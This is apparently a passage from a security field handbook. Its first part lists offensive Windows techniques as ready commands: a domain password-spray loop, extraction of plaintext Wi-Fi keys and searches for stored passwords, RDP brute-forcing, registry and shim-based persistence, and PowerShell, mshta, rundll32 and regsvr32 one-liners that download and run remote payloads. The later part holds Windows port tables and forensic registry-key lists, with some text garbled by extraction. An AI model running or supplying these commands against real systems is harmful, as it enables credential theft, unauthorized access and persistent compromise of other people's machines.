use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 &&
@echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]\IPC$ >
NULL

361
Windows OS Command Injection
[Link]
list/blob/master/[Link]

Export Plaintext Local Wireless Passwords

$> netsh wlan export profile key=clear

Search local system for passwords

$> findstr /si pass *.xml | *.doc | *.txt | *.xls | *.cfg
$> ls -R | select-string -Pattern password

REFERENCE:
!!!BEST!!!-> [Link]
Escalation-Guide/
[Link]
[Link]
[Link]
[Link]
%20and%20Resources/Windows%20-%20Privilege%[Link]
[Link]
unquoted-service-path-c7a011a8d8ae

RDP EXPLOITATION

XFREERDP -Simple User Enumeration Windows Target (kerberos based)

# Syntax = xfreerdp /v:<target_ip> -sec-nla /u:""
xfreerdp /v:[Link] -sec-nla /u:""

XFREERDP - Login
#Syntax = xfreerdp /u: /g: /p: /v:<target_ip>
xfreerdp /u:<USERNAME> /g:<RD_GATEWAY> /p:<PASS> /v:[Link]

NCRACK - Wordlist based bruteforce RDP

[Link]
ncrack -vv --user/-U <username_wordlist> --pass/-P
<password_wordlist> -s <target_ip>:3389

ncrack -vv --user <USERNAME> -P [Link] -s [Link]:3389

CROWBAR - Bruteforce Tool

[Link]
[Link] -b rdp -U user/user_wordlist> -C
<password/password_wordlist> -s <target_ip>/32 -v

[Link] -b rdp -u user -C password_wordlist -s <target_ip>/32 -v

#To use username with a DOMAIN

362
[Link] -b rdp -u <DOMAIN>\\<USER> -c <PASS> -s [Link]/32

WINDOWS PERSISTENCE
SC Service Creation
sc create newservice type= own type= interact binPath=
“C:\windows\system32\[Link] /c [Link]" & sc start newservice

Winlogon Helper DLL Shell

Requires modifications of the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell
#Modify registry with below commands:
reg add "HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon" /v Shell /d "[Link], [Link]"
/f
OR PowerShell
Set-ItemProperty "HKLM:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" "Shell" "[Link], [Link]" -
Force

Winlogon Helper DLL UserInit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit
#Modify registry with below commands:
reg add "HKLM\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon" /v Userinit /d "[Link],
[Link]" /f
#Or PowerShell
Set-ItemProperty "HKLM:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" "Userinit" "[Link], [Link]"
-Force

Winlogon GP Extensions
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\GPExtensions\{GUID}\DllName=<DLL>

OMA Client Provisioning [Link]

HKLM\SOFTWARE\Microsoft\PushRouter\Test\TestDllPath2=<DLL>

[Link] Reflective Debugger

#Add Run key to executable
HKLM\Software\Microsoft\Windows\Windows Error
Reporting\Hangs\ReflectDebugger=<path\to\exe>
#Launch
[Link] -pr 1

363
OffloadModExpo Function
HKLM\Software\Microsoft\Cryptography\Offload\ExpoOffload=<DLL>

DiskCleanup CleanupMgr
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\
cleanuppath = %SystemRoot%\System32\[Link]

Application Shim DLL Injection

#Use Microsoft Application Compatibility Toolkit (ACT) to build a
shim> [Link]
us/windows/deployment/planning/compatibility-administrator-users-
guide

#Create shim for a known application on the target host.

Navigate to the following (doesn’t have to be built/done on target
host:
Create New Compatibility Fix -> RedirectEXE -> Parameters ->
Command Line -> C:\path\to\local\[Link] -> OK -> Next ->
Finish

#Save as Shim database file .sdb

#Then install shim on target host via:
[Link] [Link]
#The .sdb file can then be deleted.

Application Shim Redirect EXE

#Use Microsoft Application Compatibility Toolkit (ACT) to build a
shim> [Link]
us/windows/deployment/planning/compatibility-administrator-users-
guide
#Place a malicious payload on a share in the target network.

#Create shim for a known application on the target host.

Navigate to the following (doesn’t have to be built/done on target
host:
Create New Compatibility Fix -> InjectDll -> Parameters -> Command
Line -> \\[Link]\path\to\[Link] -> OK -> Next -> Finish

#Save as Shim database file .sdb

#Then install shim on target host via:
[Link] [Link]
#The .sdb file can then be deleted.

VMware Tools BAT File Persistence

#Add command into one or more of the following:
C:\Program Files\VMware\VMware Tools\[Link]
C:\Program Files\VMware\VMware Tools\[Link]
C:\Program Files\VMware\VMware Tools\[Link]

364
C:\Program Files\VMware\VMware Tools\[Link]

RATTLER - Tool to identify DLL Hijacks

[Link]

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
Twitter -> @subTee

COMMAMD & CONTROL

C2 Matrix
It is the golden age of Command and Control (C2) frameworks. The
goal of this site is to point you to the best C2 framework for your
needs based on your adversary emulation plan and the target
environment. Take a look at the matrix or use the questionnaire to
determine which fits your needs.
[Link]

MORE WINDOWS LOLBIN DOWNLOAD OPTIONS

POWERSHELL
[Link] -w hidden -nop -ep bypass -c "IEX ((new-object
[Link]).downloadstring('[Link]
'))"
#OR
powershell -exec bypass -c "(New-Object
[Link]).[Link]=[[Link]]::DefaultNetw
orkCredentials;iwr('[Link]
#OR
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
#File written to WebDAV Local Cache

CMD
[Link] /k < \\webdavserver\folder\[Link]
#File written to WebDAV Local Cache

Cscript/Wscript
cscript //E:jscript \\webdavserver\folder\[Link]
#File written to WebDAV Local Cache

MSHTA

365
mshta
vbscript:Close(Execute("GetObject(""script:[Link]
.sct"")"))
#File written to IE Local Cache

OR
mshta \\webdavserver\folder\[Link]
#File written to WebDAV Local Cache

RUNDLL32
[Link]
javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http
://webserver/[Link]");[Link]();
#File written to IE Local Cache

#OR
rundll32 \\webdavserver\folder\[Link],entrypoint
#File written to WebDAV Local Cache

WMIC
wmic os get /format:"[Link]
#File written to IE Local Cache

REGSVR32
regsvr32 /u /n /s /i:[Link] [Link]
#File written to WebDAV Local Cache

#OR
regsvr32 /u /n /s /i:\\webdavserver\folder\[Link] [Link]
#File written to WebDAV Local Cache

ODBCCONF
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
#File written to WebDAV Local Cache

REFERENCE:
[Link]
remote-payload-and-execute-arbitrary-code/
[Link]
anchor
[Link]
[Link]

W W
WINDOWS_Hardening
BLUE TEAM CONFIGURATION WINDOWS

366
WINDOWS HARDENING GUIDE
[Link]

WINDOWS 10 HARDENING GUIDE

[Link]
_10_hardening.md

W W
WINDOWS_Ports
ALL INFORMATIONAL WINDOWS
Historical Windows services and ports for all versions.

DEFAULT DYNAMIC PORT RANGES:

Windows Vista and later Range= 49152-65535
Windows 2000, XP, and Server 2003 Range= 1025-5000

PORT APP_PROTO SYSTEM SERVICE

7 TCP Echo Simple TCP/IP Services
7 UDP Echo Simple TCP/IP Services
9 TCP Discard Simple TCP/IP Services
9 UDP Discard Simple TCP/IP Services
13 TCP Daytime Simple TCP/IP Services
13 UDP Daytime Simple TCP/IP Services
17 TCP Quotd Simple TCP/IP Services
17 UDP Quotd Simple TCP/IP Services
19 TCP Chargen Simple TCP/IP Services
19 UDP Chargen Simple TCP/IP Services
20 TCP FTP default data FTP Publishing Service
21 TCP FTP control FTP Publishing Service
Application Layer Gateway
21 TCP FTP control Service
23 TCP Telnet Telnet
Simple Mail Transfer
25 TCP SMTP Protocol
25 TCP SMTP Exchange Server
Windows Internet Name
42 TCP WINS Replication Service
Windows Internet Name
42 UDP WINS Replication Service
53 TCP DNS DNS Server
53 UDP DNS DNS Server
67 UDP DHCP Server DHCP Server
69 UDP TFTP Trivial FTP Daemon Service
80 TCP HTTP Windows Media Services
80 TCP HTTP WinRM 1.1 and earlier

367
 World Wide Web Publishing
80 TCP HTTP Service
80 TCP HTTP SharePoint Portal Server
Kerberos Key Distribution
88 TCP Kerberos Center
Kerberos Key Distribution
88 UDP Kerberos Center
Microsoft Exchange MTA
102 TCP X.400 Stacks
110 TCP POP3 Microsoft POP3 Service
110 TCP POP3 Exchange Server
Network News Transfer
119 TCP NNTP Protocol
123 UDP NTP Windows Time
123 UDP SNTP Windows Time
135 TCP RPC Message Queuing
135 TCP RPC Remote Procedure Call
135 TCP RPC Exchange Server
135 TCP RPC Certificate Services
135 TCP RPC Cluster Service
Distributed File System
135 TCP RPC Namespaces
135 TCP RPC Distributed Link Tracking
Distributed Transaction
135 TCP RPC Coordinator
Distributed File
135 TCP RPC Replication Service
135 TCP RPC Fax Service
135 TCP RPC Microsoft Exchange Server
135 TCP RPC File Replication Service
135 TCP RPC Group Policy
135 TCP RPC Local Security Authority
135 TCP RPC Remote Storage Notification
135 TCP RPC Remote Storage
Systems Management Server
135 TCP RPC 2.0
135 TCP RPC Terminal Services Licensing
Terminal Services Session
135 TCP RPC Directory
NetBIOS Name
137 UDP Resolution Computer Browser
NetBIOS Name
137 UDP Resolution Server
NetBIOS Name Windows Internet Name
137 UDP Resolution Service
NetBIOS Name
137 UDP Resolution Net Logon
NetBIOS Name Systems Management Server
137 UDP Resolution 2.0

368
 NetBIOS Datagram
138 UDP Service Computer Browser
NetBIOS Datagram
138 UDP Service Server
NetBIOS Datagram
138 UDP Service Net Logon
NetBIOS Datagram
138 UDP Service Distributed File System
NetBIOS Datagram Systems Management Server
138 UDP Service 2.0
NetBIOS Datagram
138 UDP Service License Logging Service
NetBIOS Session
139 TCP Service Computer Browser
NetBIOS Session
139 TCP Service Fax Service
NetBIOS Session
139 TCP Service Performance Logs and Alerts
NetBIOS Session
139 TCP Service Print Spooler
NetBIOS Session
139 TCP Service Server
NetBIOS Session
139 TCP Service Net Logon
NetBIOS Session Remote Procedure Call
139 TCP Service Locator
NetBIOS Session Distributed File System
139 TCP Service Namespaces
NetBIOS Session Systems Management Server
139 TCP Service 2.0
NetBIOS Session
139 TCP Service License Logging Service
143 TCP IMAP Exchange Server
161 UDP SNMP SNMP Service
SNMP Traps
162 UDP Outgoing SNMP Trap Service
389 TCP LDAP Server Local Security Authority
389 UDP DC Locator Local Security Authority
Distributed File System
389 TCP LDAP Server Namespaces
Distributed File System
389 UDP DC Locator Namespaces
389 UDP DC Locator Netlogon
Kerberos Key Distribution
389 UDP DC Locator Center
Distributed File System
389 TCP LDAP Server Replication
Distributed File System
389 UDP DC Locator Replication
443 TCP HTTPS HTTP SSL

369
 World Wide Web Publishing
443 TCP HTTPS Service
443 TCP HTTPS SharePoint Portal Server
443 TCP RPC over HTTPS Exchange Server 2003
443 TCP HTTPS WinRM 1.1 and earlier
445 TCP SMB Fax Service
445 TCP SMB Print Spooler
445 TCP SMB Server
Remote Procedure Call
445 TCP SMB Locator
Distributed File System
445 TCP SMB Namespaces
Distributed File System
445 TCP SMB Replication
445 TCP SMB License Logging Service
445 TCP SMB Net Logon
Kerberos Password Kerberos Key Distribution
464 UDP V5 Center
Kerberos Password Kerberos Key Distribution
464 TCP V5 Center
500 UDP IPsec ISAKMP Local Security Authority
515 TCP LPD TCP/IP Print Server
554 TCP RTSP Windows Media Services
Network News Transfer
563 TCP NNTP over SSL Protocol
RPC over HTTPS
593 TCP endpoint mapper Remote Procedure Call
593 TCP RPC over HTTPS Exchange Server
636 TCP LDAP SSL Local Security Authority
636 UDP LDAP SSL Local Security Authority
647 TCP DHCP Failover DHCP Failover
Active Directory Active Directory Web
9389 TCP Web Services Services
Active Directory Active Directory Management
9389 TCP Web Services Gateway Service
993 TCP IMAP over SSL Exchange Server
995 TCP POP3 over SSL Exchange Server
Installation Installation Bootstrap
1067 TCP Bootstrap Service protocol server
Installation Installation Bootstrap
1068 TCP Bootstrap Service protocol client
Microsoft Operations
1270 TCP MOM-Encrypted Manager 2000
1433 TCP SQL over TCP Microsoft SQL Server
1433 TCP SQL over TCP MSSQL$UDDI
1434 UDP SQL Probe Microsoft SQL Server
1434 UDP SQL Probe MSSQL$UDDI
Internet Authentication
1645 UDP Legacy RADIUS Service

370
 Internet Authentication
1646 UDP Legacy RADIUS Service
1701 UDP L2TP Routing and Remote Access
1723 TCP PPTP Routing and Remote Access
1755 TCP MMS Windows Media Services
1755 UDP MMS Windows Media Services
1801 TCP MSMQ Message Queuing
1801 UDP MSMQ Message Queuing
RADIUS Internet Authentication
1812 UDP Authentication Service
Internet Authentication
1813 UDP RADIUS Accounting Service
1900 UDP SSDP SSDP Discovery Service
2101 TCP MSMQ-DCs Message Queuing
2103 TCP MSMQ-RPC Message Queuing
2105 TCP MSMQ-RPC Message Queuing
2107 TCP MSMQ-Mgmt Message Queuing
SQL Server: Downlevel OLAP
2393 TCP OLAP Services 7.0 Client Support
SQL Server: Downlevel OLAP
2394 TCP OLAP Services 7.0 Client Support
2460 UDP MS Theater Windows Media Services
2535 UDP MADCAP DHCP Server
2701 TCP SMS Remote Control SMS Remote Control Agent
2701 UDP SMS Remote Control SMS Remote Control Agent
SMS Remote Control
2702 TCP (data) SMS Remote Control Agent
SMS Remote Control
2702 UDP (data) SMS Remote Control Agent
2703 TCP SMS Remote Chat SMS Remote Control Agent
2703 UPD SMS Remote Chat SMS Remote Control Agent
SMS Remote File
2704 TCP Transfer SMS Remote Control Agent
SMS Remote File
2704 UDP Transfer SMS Remote Control Agent
SQL Analysis SQL Server Analysis
2725 TCP Services Services
2869 TCP UPNP UPnP Device Host
SSDP event
2869 TCP notification SSDP Discovery Service
3268 TCP Global Catalog Local Security Authority
3269 TCP Global Catalog Local Security Authority
3343 UDP Cluster Services Cluster Service
NetMeeting Remote Desktop
3389 TCP Terminal Services Sharing
3389 TCP Terminal Services Terminal Services
3527 UDP MSMQ-Ping Message Queuing
4011 UDP BINL Remote Installation
4500 UDP NAT-T Local Security Authority

371
 SSDP legacy event
5000 TCP notification SSDP Discovery Service
5004 UDP RTP Windows Media Services
5005 UDP RTCP Windows Media Services
Distributed File System
5722 TCP RPC Replication
6001 TCP Information Store Exchange Server 2003
6002 TCP Directory Referral Exchange Server 2003
6004 TCP DSProxy/NSPI Exchange Server 2003
[Link] Session
42424 TCP State [Link] State Service
Microsoft Operations
51515 TCP MOM-Clear Manager 2000
5985 TCP HTTP WinRM 2.0
5986 TCP HTTPS WinRM 2.0
1024- Randomly allocated high TCP
65535 TCP RPC ports
135 TCP WMI Hyper-V service
49152 - Random allocated
65535 TCP high TCP ports Hyper-V service
Kerberos
Authentication
80 TCP (HTTP) Hyper-V service
Certificate-based
Authentication
443 TCP (HTTPS) Hyper-V service
6600 TCP Live Migration Hyper-V Live Migration
445 TCP SMB Hyper-V Live Migration
Cluster Service
3343 UDP Traffic Hyper-V Live Migration

REFERENCE:
[Link]
network-port-requirements-for-windows

W W
WINDOWS_Registry
ALL INFORMATIONAL WINDOWS

KEY DEFINITIONS
HKCU: HKEY_Current_User keys are settings specific to a user and
only apply to a specific or currently logged on user. Each user
gets their own user key to store their unique settings.

HKU: HKEY_Users keys are settings that apply to all

[Link] keys are maintained under this key.

372
HKU/<SID> is equal to HKCU. Set auditing on the appropriate
key(s)for the user logged in (HKCU)or other users by <GUID>

HKLM: HKEY_Local_Machine keys are where settings for the machine or

system that applies to everyone and everything are stored.

Common Windows registry locations and settings.

X 1
DESCRIPTION P V 7 8 0 KEY
SYSTEM\ControlSet###\Control\
X 1 FileSystem /
$MFT Zone Definition P 7 8 0 NtfsMftZoneReservation
HKLM\System\CurrentControlSet
\Control\Session
Manager\AppCompatCache\AppCom
64 BitShim Cache 7 patCache
[Link]\Software\AccessDat
a\ Products\Forensic
AccessData FTK Time Toolkit\\ Settings\ TimeZoneC
Zone Cache ache
AccessData Registry [Link]\Software\Accessdat
Viewer Recent File a\ Registry Viewer\Recent
List File List
[Link]\Software\Acro
Acro Software CutePDF Software Inc\CPW
Adobe [Link]\Software\Adobe\
[Link]\Software\Adobe\Acr
obat
Reader\AVGeneral\cRecentFiles
Adobe Acrobat \c#
Adobe Photoshop Last [Link]\Software\Adobe\ Ph
Folder otoshop\\VisitedDirs
[Link]\Software\Adobe\ Me
diaBrowser\MRU\Photoshop\ Fil
Adobe Photoshop MRUs eList\
[Link]\Software\America
Online\AOL
InstantMessenger\ CurrentVers
AIM ion\Users\ username
[Link]\Software\America
Online\AOL Instant
Messenger\ CurrentVersion\Use
AIM rs
[Link]\Software\America
Online\AOL Instant
Messenger(TM)\ CurrentVersion
\Users\screen
AIM Away Messages name\ IAmGoneList

373
 [Link]\Software\America
Online\AOL Instant
AIM File Transfers & Messenger\ CurrentVersion\Use
Sharing rs\screen name\ Xfer
[Link]\Software\America
Online\AOL Instant Messenger
(TM)\ CurrentVersion\Login -
AIM Last User Screen Name
[Link]\Software\America
Online\AOL Instant
Messenger\ CurrentVersion\Use
AIM Profile Info rs\screen name\DirEntry
[Link]\Software\America
Online\AOL Instant
Messenger\ CurrentVersion\use
rs\ username\ recent IM
AIM Recent Contacts ScreenNames
[Link]\Software\America
Online\AOL Instant
Messenger\ CurrentVersion\Use
AIM Saved Buddy List rs\username\Config Transport
All UsrClass data in 1
HKCR hive 7 8 0 HKCR\Local Settings
[Link]\Software\America
Online\AOL Instant
Messenger(TM)\CurrentVersion\
AOL 8 Messenger Away Users\[screen
Messages 7 name]\IAmGoneList
[Link]\Software\America
Online\AOL Instant
AOL 8 Messenger Buddy Messenger\CurrentVersion\User
List 7 s\username\Config Transport
[Link]\Software\America
Online\AOL Instant Messenger
(TM)\Current
AOL 8 Messenger File Version\Users\[screen
Transfers 7 name]\Xfer
[Link]\Software\America
Online\AOL Instant
AOL 8 Messenger Messenger\CurrentVersion\User
Information 7 s\username
[Link]\Software\America
Online\AOL Instant Messenger
AOL 8 Messenger Last (TM)\CurrentVersion\[Login -
User 7 Screen Name]
[Link]\Software\America
Online\AOL Instant Messenger
AOL 8 Messenger (TM)\CurrentVersion\Users\[sc
Profile Info 7 reen name]\DirEntry

374
 [Link]\Software\America
Online\AOL Instant
Messenger\CurrentVersion\user
AOL 8 Messenger s\username\[recent IM
Recent Contact 7 ScreenNames]
[Link]\Software\America
Online\AOL Instant
AOL 8 Messenger Messenger\CurrentVersion\User
Registered User 7 s
[Link]\LocalSettings\So
ftware\Microsoft\Windows\Curr
entVersion\AppModel\Repositor
y\Packages\[Link]
tedge\[Link]
_20.10240.16384.0_neutral
8wekyb3d8b
1 bwe\MicrosoftEdge\Capabilitie
App Information 0 s\FileAssociations
[Link]\LocalSettings\So
ftware\Microsoft\Windows\Curr
entVersion\AppModel\Repositor
y\Families\[Link]
tedge_8wekyb3d8bbwe\Microsoft
.MicrosoftEdge_20.10240.16384
1 .0_neut ral 8wekyb3d8bbwe /
App Install Date/Time 0 InstallTime
[Link]\Local
Settings\Software\ Microsoft\
Windows\CurrentVersion\ AppMo
1 del\Repository\Families\\/
App Install Date/Time 8 0 InstallTime
Application X 1 [Link]\Software\%Applicat
Information P 7 8 0 ion Name%
[Link]\Software\Microsoft
Application Last \Windows\CurrentVersion\Explo
Accessed 7 rer\UserAssist\
[Link]\Software\Microsoft
Application MRU Last \Windows\CurrentVersion\Explo
Visited 7 rer\ComDlg32\
[Link]\Software\Microsoft
Application MRU Open \Windows\CurrentVersion\Explo
Saved 7 rer\ComDlg32\OpenSaveMRU
[Link]\Software\Microsoft
Application MRU \Windows\CurrentVersion\Explo
Recent Document 7 rer\RecentDocs
1
AppX App Values 8 0 [Link]\
Auto Run Programs [Link]\Software\Microsoft
List 7 \Windows\CurrentVersion\Run

375
 [Link]\Software\Microsoft
\ Windows\ CurrentVersion\Exp
Autorun USBs, CDs, X 1 lorer\ AutoplayHandlers /
DVDs P 7 8 0 DisableAutoplay
Background Activity SYSTEM\CurrentControlSet\Serv
Moderator ices\bam\UserSettings\{SID}
Background Activity SYSTEM\CurrentControlSet\Serv
Moderator ices\dam\UserSettings\{SID
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\CLSID\{C8FF2A06-638A-
BitComet Agent 1 7 4913-8403-50294CFF6608}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Typelib\{2D2C1FBD-
BitComet Agent 1.0 7 624D-4789-9AE0-F4B66F9EE6E2}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\AppID\{B99B5DF3-3AD2-
BitComet Agent 2 7 463F-8F8C-86787623E1D5}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\AppID\{00980C9D-751F-
BitComet BHO 7 4A5F-B6CE-6D81998264FD}
HKEY_USERS\(SID)\Software\Mic
rosoft\Windows\CurrentVersion
\Ext\Stats\{A8DC7D60-AD8F-
BitComet DL Manager 7 491E-9A84-8FF901E7556E}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\CLSID\{A8DC7D60-AD8F-
BitComet DM Class 7 491E-9A84-8FF901E7556E}
HKEY_CURRENT_USER\(SID)\Softw
BitComet File Types 7 are\Classes\.bc!\: "BitComet"
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Windows\CurrentVersi
on\Explorer\Browser Helper
Objects\{39F7E362-828A-4B5A-
BCAF-5B79BFDFEA60}\:
BitComet GUID 7 "BitComet ClickCapture
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\CLSID\{39F7E362-828A-
BitComet Helper 7 4B5A-BCAF-5B79BFDFEA60}
HKEY_USERS\(SID)\Software\Mic
rosoft\Windows\CurrentVersion
\Ext\Stats\{39F7E362-828A-
BitComet Helper 7 4B5A-BCAF-5B79BFDFEA60}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Interface\{E8A058D1-
BitComet IBcAgent 7 C830-437F-A029-10D777A8DD40}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Interface\{6CFA2528-
BitComet IDownloadMan 7 2725-491D-8E0D-E67AB5C5A17A}

376
 HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Internet
BitComet IE DL Manage 7 Explorer\Extensions
HKEY_USERS\(SID)\Software\Mic
rosoft\Windows\CurrentVersion
\Ext\Stats\{D18A0B52-D63C-
BitComet IE Extension 7 4ED0-AFC6-C1E3DC1AF43A}
HKEY_USERS\(SID)\Software\Mic
rosoft\InternetExplorer\Down-
loadUI: "{A8DC7D60-AD8F-491E-
BitComet IE Link 1 7 9A84-8FF901E7556E}
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\InternetExplorer\Dow
nloadUI:"{A8DC7D60-AD8F-491E-
BitComet IE Link 2 7 9A84-8FF901E7556E}"
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Interface\{F08F65A5-
BitComet IIEClickCapt 7 7F91-45D7-A119-12AC4AB3D229}
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Windows\CurrentVersi
BitComet Inst. Path 7 on\AppPaths\[Link]
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Typelib\{66A8414F-
BitComet Installation 7 F2E4-4766-BE09-8F72CDDACED4}
BitLocker Drive
Encryption Driver X 1 SYSTEM\ControlSet001\services
Service P 7 8 0 \ fvevol\Enum
[Link]\Software\Microsoft
\Windows\CurrentVersion\FveAu
BitLocker To Go 7 toUnlock\
[Link]\Software\Microsoft
X 1 \ Windows\CurrentVersion\ Fve
BitLocker To Go P 7 8 0 AutoUnlock\
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Windows\CurrentVersi
on\Uninstall\(BitTorrent
BitTorrent Clients 7 Client Name)
HKEY_USERS\(SID)\Software\Mic
rosoft\WindowsNT\CurrentVersi
on\AppCompatFlags\Compatibili
BitTorrent Compatabil 7 ty Assistant\Persisted\
HKEY_USERS\(SID)\Software
\Classes\Magnet\shell\open\co
mmsnd\:""C:\Program
Files\(BitTorrent Client
Name)\(BitTorrent Client
BitTorrent Mag Links 7 Executable [Link])" "%1""
HKEY_USERS\(SID)\Software\Mic
BitTorrent MRUList 7 rosoft\Windows\CurrentVersion

377
 \Explorer\FileExts\.torrent\O
penWithList
HKEY_USERS\(SID)\Software\Mic
rosoft\Windows\CurrentVersion
BitTorrent Recent 7 \Explorer\RecentDocs\.torrent
HKEY_LOCAL_MACHINE\SOFTWARE\C
BitTorrent Reg Values 7 lasses
HKEY_LOCAL_MACHINE\(SID)\SOFT
WARE\Microsoft\Tracing\(BitTo
BitTorrent Tracing 1 7 rrent Client Name)_RASMANCS
HKEY_LOCAL_MACHINE\(SID)\SOFT
WARE\Microsoft\Tracing\(BitTo
BitTorrent Tracing 2 7 rrent Client Name)_RASAPI32
SECURITY\Policy\Secrets\Defau
ltPassword/[CurrVal and
Cached Passwords 7 OldVal]
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
1 orer\ RecentDocs\.jpg&ls=0&b=
Camera App 0 0
1 SYSTEM\ControlSet001\Enum\USB
Camera Mounting 7 8 0 \
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
orer\ CD
Burning\Drives\Volume\ Curren
CD Burning 7 8 t Media
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
X orer\ CD Burning\ Current
CD Burning P Media /Disc Label
CDROM Enumeration X 1 SYSTEM\ControlSet001\services
Service P 7 8 0 \ cdrom\Enum
SYSTEM\ControlSet001\Control\
Class GUID for HDD X 1 Class\{4D36E967-E325-11CE-
Drivers P 7 8 0 BFC1- 08002BE10318}
SYSTEM\ControlSet001\Control\
Class GUID for X 1 Class\{71A27CDD-812A-11D0-
Storage Volumes P 7 8 0 BEC7-08002BE2092F}
Class GUID for USB SYSTEM\ControlSet001\Control\
Host Controllers and X 1 Class\{36FC9E60-C465-11CF-
Hubs P 7 8 0 8056-444553540000}
Class GUID for SYSTEM\ControlSet001\Control\
Windows Portable 1 Class\{EEC5AD98-8080-425F-
Devices WPD 7 8 0 922A-DABF3DE3F69A}
X 1
Class Identifiers P 7 8 0 SOFTWARE\Classes\CLSID
Classes HKEY_CLASSES_ROOT
Clearing Page File at X 1 SYSTEM\ControlSet###\Control\
Shutdown P 7 8 0 Session Manager\Memory

378
 Management /
ClearPageFileAtShutdown
SYSTEM\ControlSet###\Control\
Session Manager\Memory
Clearing PageFile at Management\ClearPageFileAtShu
Shutdown 7 tdown
[Link]\SOFTWARE\Microsoft
\Windows\CurrentVersion\Explo
1 rer\ComDlg32\OpenSavePidlMRU\
Common Dialog 0 .vhd
[Link]\Software\Microsoft
Common Dialog 32 CID X 1 \ Windows\CurrentVersion\Expl
Size MRU App Access P 7 8 0 orer\ ComDlg32\CIDSizeMRU
Common Dialog 32 [Link]\Software\Microsoft
First Folder App \ Windows\CurrentVersion\Expl
Access 7 8 orer\ ComDlg32\FirstFolder
Common Dialog 32 Last [Link]\Software\Microsoft
Visited MRU App X \ Windows\CurrentVersion\Expl
Access P orer\ComDlg32\LastVisitedMRU
[Link]\Software\Microsoft
Common Dialog 32 Last \ Windows\CurrentVersion\Expl
Visited PIDL MRU App X 1 orer\ ComDlg32\LastVisitedPid
Access P 7 8 0 lMRU
Common Dialog 32 Open [Link]\Software\Microsoft
Save document Access \ Windows\ CurrentVersion\Exp
by Extension lorer\ ComDlg32\OpenSaveMRU\
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
Common Dialog X 1 orer\ ComDlg32\LastVisitedPid
ComDlg32 Access P 7 8 0 lMRULegacy
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
Common Dialog X 1 orer\ ComDlg32\OpenSavePidlMR
ComDlg32 Access P 7 8 0 U\
Communications App E-
Mail ID [Link]\
Communications App E- [Link]\LocalState\Platf
Mail User Name orm / UserName
Communications App ID [Link]\RoamingState\\ A
info ccounts
X 1 SYSTEM\ControlSet###\Control\
Computer Name P 7 8 0 ComputerName\ComputerName
SYSTEM\ControlSet###\Control\
Computer Name Active X 1 ComputerName\ComputerName\ Ac
Computer Name P 7 8 0 tiveComputerName
Computer Name and X 1 [Link]\Software\Microsoft
Volume Serial Number P 7 8 0 \ Windows Media\WMSDK\General
X 1 [Link]\\Control
Converted Wallpaper P 7 8 0 Panel\Desktop

379
 [Link]\Software\Microsoft
1 \ Windows\CurrentVersion\Expl
Cortana Search 0 orer\ FileExts\.com/search?q=
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
orer\ RecentDocs\.&input=2&FO
1 RM=WNS BOX&cc=US&setlang=en-
Cortana Search 0 US&sbts=/ 0
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
Credential Provider on\Authentication\Credential
Filters Provider Filters\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
CurrentVersion\Authentication
Credential Provider \Credential Provider
Filters Filters\*
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows\CurrentVersi
on\Authentication\Credential
Credential Providers Providers\*
HKEY_LOCAL_MACHINE\Software\W
ow6432Node\Microsoft\Windows\
CurrentVersion\Authentication
Credential Providers \Credential Providers\*
Current Configuration HKEY_CURRENT_CONFIG
Current Control Set 7 SYSTEM\Select
X 1
Current Control Set P 7 8 0 SYSTEM\Select
Current Control Set
Information 7 SYSTEM\Select\Current
Current Drive X 1 SYSTEM\ControlSet001\services
Enumeration Service P 7 8 0 \ Disk\Enum
[Link]\Software\Microsoft
\Windows\CurrentVersion\Theme
Current Theme 7 s
Current USB Storage X 1 SYSTEM\ControlSet001\services
Enumeration Service P 7 8 0 \ USBSTOR\Enum
Current Version X 1 SOFTWARE\Microsoft\Windows\ C
Information P 7 8 0 urrentVersion\
Currently Defined SYSTEM\ControlSet###\Control\
Printer 7 Print\Printers
Currently Mounted 1 SYSTEM\CurrentControlSet\Serv
Drives MRU 7 8 0 ices\ Disk\Enum
Custom Group List by
RID 7 SAM\Domains\Account\Aliases\
SAM\Domains\Account\Aliases\N
Custom Group Names 7 ames

380
 HKEY_USERS\SID\Software\Speed
X Bit\Download
DAP Categories P Accelerator\Category
